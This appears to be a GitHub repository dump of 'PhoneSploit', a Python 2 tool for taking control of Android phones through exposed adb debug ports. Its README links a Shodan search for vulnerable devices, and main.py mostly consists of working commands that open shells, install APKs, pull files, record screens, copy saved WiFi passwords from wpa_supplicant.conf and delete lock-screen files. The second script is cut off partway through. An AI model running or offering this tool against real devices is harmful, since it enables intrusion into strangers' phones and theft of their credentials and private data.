├── README.md
├── Screenshot.png
├── adb.rar
├── main.py
└── main_linux.py
/README.md:
--------------------------------------------------------------------------------
1 | # Recent News (New Update v.1.2)
2 | Port Forwarding
NetStat
3 | Grab wpa_supplicant
Turn WiFi On/Off
4 | Show Mac/Inet
Remove Password
5 | Extract apk from app
Use Keycode
6 | Get Battery Status
Get Current Activity
7 |
8 | # PhoneSploit
9 | Using open Adb ports we can exploit a device
10 |
you can find open ports here https://www.shodan.io/search?query=android+debug+bridge+product%3A”Android+Debug+Bridge”
11 |
12 |
To find out how to access a local device --> https://www.youtube.com/watch?v=u__PT3JpDx4
13 |
14 |
15 | # HOW TO INSTALL WINDOWS
16 | ```
17 | git clone https://github.com/Zucccs/PhoneSploit
18 | extract adb.rar to the phonesploit directory
19 | cd PhoneSploit
20 | pip install colorama
21 | python2 main.py
22 | ```
23 |
24 | # HOW TO INSTALL Linux
25 | ```
26 | git clone https://github.com/Zucccs/PhoneSploit
27 | cd PhoneSploit
28 | pip install colorama
29 | python2 main_linux.py
30 | ```
31 |
32 |
33 | # VIDEO
34 | [](https://www.youtube.com/watch?v=u__PT3JpDx4)
35 |
36 | # ScreenShots
37 | 
38 |
--------------------------------------------------------------------------------
/Screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ByteUprise/Phonesploit/a8ddd8c6ca964f08dc8030401c8952d93da1bb3a/Screenshot.png
--------------------------------------------------------------------------------
/adb.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ByteUprise/Phonesploit/a8ddd8c6ca964f08dc8030401c8952d93da1bb3a/adb.rar
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
1 | # coding: latin-1
2 |
3 | #Coded By Zucccs
4 | # Enjoy
5 |
6 |
7 | #=============================
8 | #Imports
9 |
10 | import os
11 | import random
12 | import urllib2
13 | import time as t
14 | from colorama import Fore, init
15 |
16 | #=============================
17 | # Variables
18 | CurrentDir = os.path.dirname(os.path.abspath(__file__))
19 | load_count = 0
20 |
21 | #=============================
22 | #Install Functions
23 | # def ColoringModeStartup():
24 | # coloring_file = open(CurrentDir+"\\install\\coloring.txt", "a+")
25 | # line = open(CurrentDir+"\\install\\coloring.txt", "a+").readline()
26 | # if 'true' in line:
27 | # init(convert=True)
28 | # main()
29 | # if 'false' in line:
30 | # windows=False
31 | # main()
32 | # if "NOT_LOADED" in line:
33 | # platform_choice = raw_input("Are you loading this script in (W)indows or (L)inux: ")
34 | # open(CurrentDir+"\\install\\coloring.txt", "w").close()
35 | # if platform_choice.lower() == 'w':
36 | # coloring_file.write("true")
37 | # else:
38 | # coloring_file.write("false")
39 | # yn = raw_input(Fore.WHITE + "Have you already installed adb via command line "+Fore.GREEN + "Y"+Fore.WHITE+"/"+Fore.RED+"N "+Fore.WHITE)
40 | # if yn == "n":
41 | # os.system("sudo apt install adb")
42 | # else:
43 | # main()
44 |
45 | #=============================
46 | # Graphics # http://patorjk.com/software/taag/#p=display&f=Graffiti&t=Type%20Something%20
47 |
48 | arrow = Fore.RED + " └──>".decode("utf-8") + Fore.WHITE
49 | connect = Fore.RED + "│".decode("utf-8") + Fore.WHITE
50 | page2 = False
51 |
52 | logo_design_1 = ('''
53 | {0} ____ __ _____ __ _ __
54 | / __ \/ /_ ____ ____ ___ / ___/____ / /___ (_) /_
55 | / /_/ / __ \/ __ \/ __ \/ _ \\__ \/ __ \ / / __ \/ / __/
56 | {1} / ____/ / / / /_/ / / / / __/__/ / /_/ / / /_/ / / /_
57 | /_/ /_/ /_/\____/_/ /_/\___/____/ .___/_/\____/_/\__/
58 | /_/''').format(Fore.GREEN, Fore.WHITE, Fore.RED)
59 |
60 | logo_design_2 = Fore.GREEN + '''
61 | .;' `;,
62 | .;' ,;' `;, `;, {0}PhoneSploit
63 | .;' ,;' ,;' `;, `;, `;,
64 | :: :: : {1}( ){0} : :: :: {1}Coded by Zucccs / Metachar{0}
65 | ':. ':. ':. {1}/_\{0} ,:' ,:' ,:'
66 | ':. ':. {1}/___\{0} ,:' ,:'
67 | ':. {1}/_____\{0} ,:'
68 | {1}/ \\{0}
69 | '''.format(Fore.GREEN, Fore.WHITE, Fore.RED)
70 |
71 | logo_design_pre = '''
72 | {0}╔═╗{1}┬ ┬┌─┐┌┐┌┌─┐{0}╔═╗{1}┌─┐┬ ┌─┐┬┌┬┐
73 | {0}╠═╝{1}├─┤│ ││││├┤ {0}╚═╗{1}├─┘│ │ ││ │
74 | {0}╩ {1}┴ ┴└─┘┘└┘└─┘{0}╚═╝{1}┴ ┴─┘└─┘┴ ┴ '''.format(Fore.GREEN, Fore.WHITE, Fore.RED)
75 | logo_design_3 = logo_design_pre.decode("utf-8")
76 |
77 | logo_design_4 = '''
78 | \033[92m
79 | +hydNNNNdyh+
80 | +mMMMMMMMMMMMMm+
81 | `dMMm\033[0m:\033[92mNMMMMMMN\033[0m:\033[92mmMMd`
82 | hMMMMMMMMMMMMMMMMMMh
83 | \033[92m.. yyyyyyyyyyyyyyyyyyyy .. \033[0m Expoit time :) \033[92m
84 | \033[92m.mMMm`MMMMMMMMMMMMMMMMMMMM`mMMm. \033[0m Thanks for downloading!\033[92m
85 | \033[92m:MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM:
86 | :MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM:
87 | :MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM:
88 | :MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM:
89 | -MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM-
90 | +yy+ MMMMMMMMMMMMMMMMMMMM +yy+
91 | mMMMMMMMMMMMMMMMMMMm
92 | `/++MMMMh++hMMMM++/`
93 | MMMMo oMMMM
94 | MMMMo oMMMM
95 | oNMm- -mMNs'''
96 |
97 | logo_design_5 = '''
98 | {0}______ {1}__ __ ______ __ __ ______ {0}______ {1}______ __ ______ __ ______
99 | {0}/\ == \ {1}/\ \_\ \ /\ __ \ /\ "-.\ \ /\ ___\ {0}/\ ___\ {1}/\ == \ /\ \ /\ __ \ /\ \ /\__ _\
100 | {0}\ \ _-/ {1}\ \ __ \ \ \ \/\ \ \ \ \-. \ \ \ __\ {0}\ \___ \ {1}\ \ _-/ \ \ \____ \ \ \/\ \ \ \ \ \/_/\ \/
101 | {0}\ \_\ {1}\ \_\ \_\ \ \_____\ \ \_\\"\_\ \ \_____\ {0}\/\_____\ {1}\ \_\ \ \_____\ \ \_____\ \ \_\ \ \_\
102 | {0}\/_/ {1}\/_/\/_/ \/_____/ \/_/ \/_/ \/_____/ {0}\/_____/ {1}\/_/ \/_____/ \/_____/ \/_/ \/_/
103 | '''.format(Fore.WHITE, Fore.GREEN)
104 |
105 | logo_design_6 = Fore.RED + '''
106 | ,____
107 | |---.\\
108 | ___ | ` PHONESPLOIT
109 | / .-\ ./=)
110 | | |"|_/\/|
111 | ; |-;| /_| REAP THE REWARDS
112 | / \_| |/ \ |
113 | / \/\( |
114 | | / |` ) |
115 | / \ _/ |
116 | /--._/ \ |
117 | `/|) | /
118 | / | |
119 | .' | |
120 | / \ |
121 | (_.-.__.__./ /
122 |
123 | '''
124 |
125 | logo_design_7 = Fore.GREEN + '''
126 | .o oOOOOOOOo OOOo
127 | Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
128 | OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
129 | OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
130 | `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
131 | .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
132 | OOOOO '"OOOOOOOOOOOOOOOO"` oOO
133 | oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
134 | oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
135 | OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
136 | "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
137 | Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
138 | : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
139 | . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
140 | '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
141 | `$" `OOOO' `O"Y ' `OOOO' o .
142 | . . OP" : o .
143 |
144 | '''
145 |
146 | page_1 = '''\n
147 | {0}[{1}1{0}] {2}Show Connected Devices {0}[{1}6{0}] {2}Screen record a phone {0}[{1}11{0}] {2}Uninstall an app
148 | {0}[{1}2{0}] {2}Disconect all devices {0}[{1}7{0}] {2}Screen Shot a picture on a phone {0}[{1}12{0}] {2}Show real time log of device
149 | {0}[{1}3{0}] {2}Connect a new phone {0}[{1}8{0}] {2}Restart Server {0}[{1}13{0}] {2}Dump System Info
150 | {0}[{1}4{0}] {2}Access Shell on a phone {0}[{1}9{0}] {2}Pull folders from phone to pc {0}[{1}14{0}] {2}List all apps on a phone
151 | {0}[{1}5{0}] {2}Install an apk on a phone {0}[{1}10{0}] {2}Turn The Device off {0}[{1}15{0}] {2}Run an app
152 |
153 |
154 | {0}[{1}99{0}] {2}Exit {0}[{1}0{0}] {2}Clear {0}[{1}p{0}] Next Page v1.2
155 | '''.format(Fore.CYAN, Fore.RED, Fore.GREEN)
156 |
157 | page_2 = '''\n
158 | {0}[{1}16{0}]{2} Port Forwarding {0}[{1}21{0}]{2} NetStat
159 | {0}[{1}17{0}]{2} Grab wpa_supplicant {0}[{1}22{0}]{2} Turn WiFi On/Off
160 | {0}[{1}18{0}]{2} Show Mac/Inet {0}[{1}23{0}]{2} Remove Password
161 | {0}[{1}19{0}]{2} Extract apk from app {0}[{1}24{0}]{2} Use Keycode
162 | {0}[{1}20{0}]{2} Get Battery Status {0}[{1}25{0}]{2} Get Current Activity
163 |
164 |
165 | {0}[{1}99{0}] {2}Exit {0}[{1}0{0}] {2}Clear {0}[{1}b{0}] Back to page one
166 | '''.format(Fore.CYAN, Fore.RED, Fore.GREEN)
167 |
168 |
169 | #=============================
170 | #Main
171 | def main():
172 | page_num = 1
173 | option = raw_input(Fore.WHITE + "phonesploit"+Fore.RED + "(main_menu) "+Fore.WHITE + "> ")
174 | if option == '1':
175 | os.system("adb devices -l")
176 | elif option == '2':
177 | os.system("adb disconnect")
178 | elif option == '3':
179 | os.system("adb tcpip 5555")
180 | print (("\n[{0}+{1}] Enter a phones ip address.").format(Fore.RED, Fore.WHITE))
181 | ip = raw_input (arrow+" phonesploit"+Fore.RED + "(connect_phone) "+Fore.WHITE + "> ")
182 | os.system("adb connect "+ip+":5555")
183 |
184 | elif option == '4':
185 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
186 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(shell_on_phone) "+Fore.WHITE + "> ")
187 | os.system("adb -s "+device_name+" shell")
188 |
189 | elif option == '5':
190 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
191 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(apk_install) "+Fore.WHITE + "> ")
192 | print ((" "+connect))
193 | print ((" [{0}+{1}]Enter the apk location.").format(Fore.RED, Fore.WHITE))
194 | apk_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(apk_install) "+Fore.WHITE + "> ")
195 | os.system("adb -s "+device_name+" install "+apk_location)
196 | print (Fore.GREEN + "Apk has been installed.")
197 |
198 | elif option == '6':
199 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
200 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(screen_record) "+Fore.WHITE + "> ")
201 | print ((" "+connect))
202 | print ((" [{0}+{1}] Please wait 3m its recording").format(Fore.RED, Fore.WHITE))
203 | print ((" "+connect))
204 | os.system("adb -s "+device_name+" shell screenrecord /sdcard/demo.mp4")
205 | print ((" [{0}+{1}]Enter where you would like the video to be saved.").format(Fore.RED, Fore.WHITE))
206 | place_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(screen_record) "+Fore.WHITE + "> ")
207 | os.system("adb -s "+device_name+" pull /sdcard/demo.mp4 "+place_location)
208 |
209 | elif option == '7':
210 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
211 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(screenshot) "+Fore.WHITE + "> ")
212 | os.system("adb -s "+device_name+" shell screencap /sdcard/screen.png")
213 | print ((" "+connect))
214 | print ((" [{0}+{1}]Enter where you would like the screenshot to be saved.").format(Fore.RED, Fore.WHITE))
215 | place_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(screenshot) "+Fore.WHITE + "> ")
216 | os.system("adb -s "+device_name+" pull /sdcard/screen.png "+place_location)
217 |
218 | elif option == '8':
219 | os.system("adb kill-server && adb start-server")
220 |
221 | elif option == '9':
222 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
223 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(file_pull) "+Fore.WHITE + "> ")
224 | print ((" "+connect))
225 | print ((" [{0}+{1}]Enter a file location on a device").format(Fore.RED, Fore.WHITE))
226 | file_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(file_pull) "+Fore.WHITE + "> ")
227 | print ((" "+connect))
228 | print ((" [{0}+{1}]Enter where you would like the file to be saved.").format(Fore.RED, Fore.WHITE))
229 | place_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(file_pull) "+Fore.WHITE + "> ")
230 | os.system("adb -s "+device_name+" pull "+file_location+" "+place_location)
231 |
232 | elif option == '10':
233 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
234 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(device_reboot) "+Fore.WHITE + "> ")
235 | os.system("adb -s "+device_name+ " reboot ")
236 |
237 | elif option == '11':
238 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
239 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(app_delete) "+Fore.WHITE + "> ")
240 | print ((" "+connect))
241 | print ((" [{0}+{1}]Enter a package name.").format(Fore.RED, Fore.WHITE))
242 | package_name = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(app_delete) "+Fore.WHITE + "> ")
243 | os.system("adb -s "+device_name+" unistall "+package_name)
244 |
245 | elif option == '12':
246 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
247 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(log) "+Fore.WHITE + "> ")
248 | os.system('adb -s '+device_name+" logcat ")
249 |
250 | elif option == '13':
251 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
252 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(sys_info) "+Fore.WHITE + "> ")
253 | os.system("adb -s "+device_name+" dumpsys")
254 |
255 | elif option == '14':
256 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
257 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(package_manager) "+Fore.WHITE + "> ")
258 | os.system("adb -s " +device_name+ " shell pm list packages -f")
259 | main()
260 |
261 | elif option == '15':
262 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
263 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(app_run) "+Fore.WHITE + "> ")
264 | print ((" "+connect))
265 | print ((" [{0}+{1}]Enter a package name. They look like this --> com.snapchat.android").format(Fore.RED, Fore.WHITE))
266 | package_name = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(app_run) "+Fore.WHITE + "> ")
267 | os.system("adb -s "+device_name+" shell monkey -p "+package_name+" -v 500")
268 | main()
269 |
270 | elif option == '16':
271 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
272 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(port_forward) "+Fore.WHITE + "> ")
273 | print ((" "+connect))
274 | print ((" [{0}+{1}]Enter a port on the device.").format(Fore.RED, Fore.WHITE))
275 | port_device = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(port_forward) "+Fore.WHITE + "> ")
276 | print ((" "+connect))
277 | print ((" [{0}+{1}]Enter a port to forward it too.").format(Fore.RED, Fore.WHITE))
278 | forward_port = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(port_forward) "+Fore.WHITE + "> ")
279 | os.system("adb -s "+device_name+" forward tcp:"+port_device+" tcp:"+forward_port)
280 |
281 | elif option == '17':
282 | try:
283 | print (("[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
284 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(wpa_grab) "+Fore.WHITE + "> ")
285 | print ((Fore.WHITE + " [{0}+{1}]{1}THE DEVICE NEEDS TO BE ROOTED TO CONTINUE TO EXIT USE CTRL +C").format(Fore.RED, Fore.WHITE))
286 | print ((" "+connect))
287 | print ((" [{0}+{1}]Enter where you want the file to be saved.").format(Fore.RED, Fore.WHITE))
288 | location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(wpa_grab) "+Fore.WHITE + "> ")
289 | os.system("adb -s "+device_name+" shell "+"su -c 'cp /data/misc/wifi/wpa_supplicant.conf /sdcard/'")
290 | os.system("adb -s "+device_name+" pull /sdcard/wpa_supplicant.conf "+location)
291 | except KeyboardInterrupt:
292 | main()
293 |
294 | elif option == '18':
295 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
296 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(mac_inet) "+Fore.WHITE + "> ")
297 | os.system("adb -s " +device_name+ " shell ip address show wlan0")
298 | main()
299 |
300 | elif option == '19':
301 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
302 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ")
303 | print ((" "+connect))
304 | print ((" [{0}+{1}]Enter a package name. They look like this --> com.snapchat.android").format(Fore.RED, Fore.WHITE))
305 | package_name = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ")
306 | os.system("adb -s "+device_name+" shell pm path "+package_name)
307 | print ((" "+connect))
308 | print ((" [{0}+{1}]Enter The path.looks like this /data/app/com.snapchat.android-qWgDcBiCEvANq6op_NPqeA==/base.apk").format(Fore.RED, Fore.WHITE))
309 | path = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ")
310 | print ((" "+connect))
311 | print ((" [{0}+{1}]Enter The location to store the apk: ") .format(Fore.RED, Fore.WHITE))
312 | location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ")
313 | os.system("adb -s " +device_name+" pull "+path+" "+location)
314 | main()
315 |
316 | elif option == '20':
317 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
318 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(battery) "+Fore.WHITE + "> ")
319 | os.system("adb -s " +device_name+ " shell dumpsys battery")
320 | main()
321 |
322 | elif option == '21':
323 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
324 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(net_stat) "+Fore.WHITE + "> ")
325 | os.system("adb -s " +device_name+ " shell netstat")
326 | main()
327 |
328 | elif option == '22':
329 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
330 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(wifi) "+Fore.WHITE + "> ")
331 | print ((" "+connect))
332 | print ((" [{0}+{1}] To turn wifi back on you need the device to be pluged in.").format(Fore.RED, Fore.WHITE))
333 | print ((" "+connect))
334 | on_off = raw_input(Fore.WHITE + " ["+Fore.RED+"+"+Fore.WHITE+"]Would you like the wifi "+Fore.GREEN +"on"+Fore.WHITE +"/"+Fore.RED +"off "+Fore.WHITE)
335 | if on_off == 'off':
336 | command = " shell svc wifi disable"
337 | else:
338 | command = " shell svc wifi enable"
339 |
340 | os.system("adb -s "+device_name+command)
341 |
342 | elif option == '23':
343 | print (("[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
344 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(pass_remove) "+Fore.WHITE + "> ")
345 | print ((Fore.WHITE + " [{0}+{1}]{1}THE DEVICE NEEDS TO BE ROOTED TO CONTINUE TO EXIT USE CTRL +C THIS IS ALSO UNTESTED").format(Fore.RED, Fore.WHITE))
346 | print ((" "+connect))
347 | print (Fore.RED + "******************TRYING TO REMOVE PASS******************")
348 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/gesture.key'")
349 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/locksettings.db'")
350 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/locksettings.db-wal'")
351 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/locksettings.db-shm'")
352 | print (Fore.RED + "******************TRYING TO REMOVE PASS******************")
353 |
354 | elif option == '24':
355 | print (("[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
356 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(keycode) "+Fore.WHITE + "> ")
357 | print ('''
358 | 0 --> "KEYCODE_UNKNOWN"
359 | 1 --> "KEYCODE_MENU"
360 | 2 --> "KEYCODE_SOFT_RIGHT"
361 | 3 --> "KEYCODE_HOME"
362 | 4 --> "KEYCODE_BACK"
363 | 5 --> "KEYCODE_CALL"
364 | 6 --> "KEYCODE_ENDCALL"
365 | 7 --> "KEYCODE_0"
366 | 8 --> "KEYCODE_1"
367 | 9 --> "KEYCODE_2"
368 | 10 --> "KEYCODE_3"
369 | 11 --> "KEYCODE_4"
370 | 12 --> "KEYCODE_5"
371 | 13 --> "KEYCODE_6"
372 | 14 --> "KEYCODE_7"
373 | 15 --> "KEYCODE_8"
374 | 16 --> "KEYCODE_9"
375 | 17 --> "KEYCODE_STAR"
376 | 18 --> "KEYCODE_POUND"
377 | 19 --> "KEYCODE_DPAD_UP"
378 | 20 --> "KEYCODE_DPAD_DOWN"
379 | 21 --> "KEYCODE_DPAD_LEFT"
380 | 22 --> "KEYCODE_DPAD_RIGHT"
381 | 23 --> "KEYCODE_DPAD_CENTER"
382 | 24 --> "KEYCODE_VOLUME_UP"
383 | 25 --> "KEYCODE_VOLUME_DOWN"
384 | 26 --> "KEYCODE_POWER"
385 | 27 --> "KEYCODE_CAMERA"
386 | 28 --> "KEYCODE_CLEAR"
387 | 29 --> "KEYCODE_A"
388 | 30 --> "KEYCODE_B"
389 | 31 --> "KEYCODE_C"
390 | 32 --> "KEYCODE_D"
391 | 33 --> "KEYCODE_E"
392 | 34 --> "KEYCODE_F"
393 | 35 --> "KEYCODE_G"
394 | 36 --> "KEYCODE_H"
395 | 37 --> "KEYCODE_I"
396 | 38 --> "KEYCODE_J"
397 | 39 --> "KEYCODE_K"
398 | 40 --> "KEYCODE_L"
399 | 41 --> "KEYCODE_M"
400 | 42 --> "KEYCODE_N"
401 | 43 --> "KEYCODE_O"
402 | 44 --> "KEYCODE_P"
403 | 45 --> "KEYCODE_Q"
404 | 46 --> "KEYCODE_R"
405 | 47 --> "KEYCODE_S"
406 | 48 --> "KEYCODE_T"
407 | 49 --> "KEYCODE_U"
408 | 50 --> "KEYCODE_V"
409 | 51 --> "KEYCODE_W"
410 | 52 --> "KEYCODE_X"
411 | 53 --> "KEYCODE_Y"
412 | 54 --> "KEYCODE_Z"
413 | 55 --> "KEYCODE_COMMA"
414 | 56 --> "KEYCODE_PERIOD"
415 | 57 --> "KEYCODE_ALT_LEFT"
416 | 58 --> "KEYCODE_ALT_RIGHT"
417 | 59 --> "KEYCODE_SHIFT_LEFT"
418 | 60 --> "KEYCODE_SHIFT_RIGHT"
419 | 61 --> "KEYCODE_TAB"
420 | 62 --> "KEYCODE_SPACE"
421 | 63 --> "KEYCODE_SYM"
422 | 64 --> "KEYCODE_EXPLORER"
423 | 65 --> "KEYCODE_ENVELOPE"
424 | 66 --> "KEYCODE_ENTER"
425 | 67 --> "KEYCODE_DEL"
426 | 68 --> "KEYCODE_GRAVE"
427 | 69 --> "KEYCODE_MINUS"
428 | 70 --> "KEYCODE_EQUALS"
429 | 71 --> "KEYCODE_LEFT_BRACKET"
430 | 72 --> "KEYCODE_RIGHT_BRACKET"
431 | 73 --> "KEYCODE_BACKSLASH"
432 | 74 --> "KEYCODE_SEMICOLON"
433 | 75 --> "KEYCODE_APOSTROPHE"
434 | 76 --> "KEYCODE_SLASH"
435 | 77 --> "KEYCODE_AT"
436 | 78 --> "KEYCODE_NUM"
437 | 79 --> "KEYCODE_HEADSETHOOK"
438 | 80 --> "KEYCODE_FOCUS"
439 | 81 --> "KEYCODE_PLUS"
440 | 82 --> "KEYCODE_MENU"
441 | 83 --> "KEYCODE_NOTIFICATION"
442 | 84 --> "KEYCODE_SEARCH"
443 | 85 --> "TAG_LAST_KEYCODE"
444 | ''')
445 | print (("[{0}+{1}]Enter a number.").format(Fore.RED, Fore.WHITE))
446 | num = raw_input(arrow + "phonesploit"+Fore.RED + "(keycode) "+Fore.WHITE + "> ")
447 | os.system("adb -s "+device_name+" shell input keyevent "+num)
448 |
449 | elif option == '25':
450 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
451 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(current_activity) "+Fore.WHITE + "> ")
452 | os.system("adb -s " +device_name+ " dumpsys activity")
453 | main()
454 |
455 | elif option == '0':
456 | global page2
457 | if page2 == True:
458 | clear(page_2)
459 | else:
460 | clear(page_1)
461 |
462 | elif option == 'p':
463 | os.system('cls')
464 | page2 = True
465 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4])
466 | print (Fore.RED + banner_title)
467 | print (page_2)
468 |
469 | elif option == 'b':
470 | os.system('cls')
471 | page2 = False
472 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4])
473 | print (Fore.RED + banner_title)
474 | print (page_1)
475 |
476 | elif option == '99':
477 | exit()
478 |
479 |
480 | main()
481 |
482 | #=============================
483 |
484 | def clear(page):
485 | global page2
486 | os.system('cls')
487 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4,logo_design_5,logo_design_6,logo_design_7])
488 | print (Fore.RED + banner_title)
489 | print (page)
490 |
491 |
492 |
493 | #=============================
494 | # Run
495 | try:
496 | init(convert=True)
497 | os.chdir(CurrentDir+"//adb")
498 | print (Fore.RED + "Starting adb server..")
499 | os.system("adb tcpip 5555")
500 | t.sleep(4)
501 | os.system('cls')
502 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4,logo_design_5,logo_design_6,logo_design_7])
503 | print (Fore.RED + banner_title)
504 | print (page_1)
505 | main()
506 | except KeyboardInterrupt:
507 | main()
--------------------------------------------------------------------------------
/main_linux.py:
--------------------------------------------------------------------------------
1 | #-*- coding: utf-8 -*-
2 |
3 | #Coded By Zucccs
4 | # Enjoy
5 |
6 |
7 | #=============================
8 | #Imports
9 | import os
10 | import sys
11 | import random
12 | import time as t
13 | from colorama import Fore, init
14 |
15 | reload(sys)
16 | sys.setdefaultencoding("utf-8")
17 |
18 | #=============================
19 | # Variables
20 | CurrentDir = os.path.dirname(os.path.abspath(__file__))
21 | load_count = 0
22 |
23 | #=============================
24 | #Install Functions
25 | # def ColoringModeStartup():
26 | # coloring_file = open(CurrentDir+"\\install\\coloring.txt", "a+")
27 | # line = open(CurrentDir+"\\install\\coloring.txt", "a+").readline()
28 | # if 'init' in line:
29 | # init(convert=True)
30 | # main()
31 | # if 'false' in line:
32 | # main()
33 | # if "NOT_LOADED" in line:
34 | # platform_choice = raw_input("Are you loading this script in (W)indows or (L)inux: ")
35 | # open(CurrentDir+"\\install\\coloring.txt", "w").close()
36 | # if platform_choice.lower() == 'w':
37 | # coloring_file.write("init")
38 | # else:
39 | # coloring_file.write("false")
40 | # yn = raw_input(Fore.WHITE + "Have you already installed adb via command line "+Fore.GREEN + "Y"+Fore.WHITE+"/"+Fore.RED+"N "+Fore.WHITE)
41 | # if yn == "n":
42 | # os.system("sudo apt install adb")
43 | # else:
44 | # main()
45 |
46 | #=============================
47 | # Graphics # http://patorjk.com/software/taag/#p=display&f=Graffiti&t=Type%20Something%20
48 |
49 | arrow = Fore.RED + " └──>".decode("utf-8").strip() + Fore.WHITE
50 | arrow = str(arrow)
51 | connect = Fore.RED + "│".decode("utf-8").strip() + Fore.WHITE
52 |
53 | logo_design_1 = ('''
54 | {0} ____ __ _____ __ _ __
55 | / __ \/ /_ ____ ____ ___ / ___/____ / /___ (_) /_
56 | / /_/ / __ \/ __ \/ __ \/ _ \\__ \/ __ \/ / __ \/ / __/
57 | {1} / ____/ / / / /_/ / / / / __/__/ / /_/ / / /_/ / / /_
58 | /_/ /_/ /_/\____/_/ /_/\___/____/ .___/_/\____/_/\__/
59 | /_/''').format(Fore.GREEN, Fore.WHITE, Fore.RED)
60 |
61 | logo_design_2 = Fore.GREEN + '''
62 | .;' `;,
63 | .;' ,;' `;, `;, {0}PhoneSploit
64 | .;' ,;' ,;' `;, `;, `;,
65 | :: :: : {1}( ){0} : :: :: {1}Coded by Zucccs / Metachar{0}
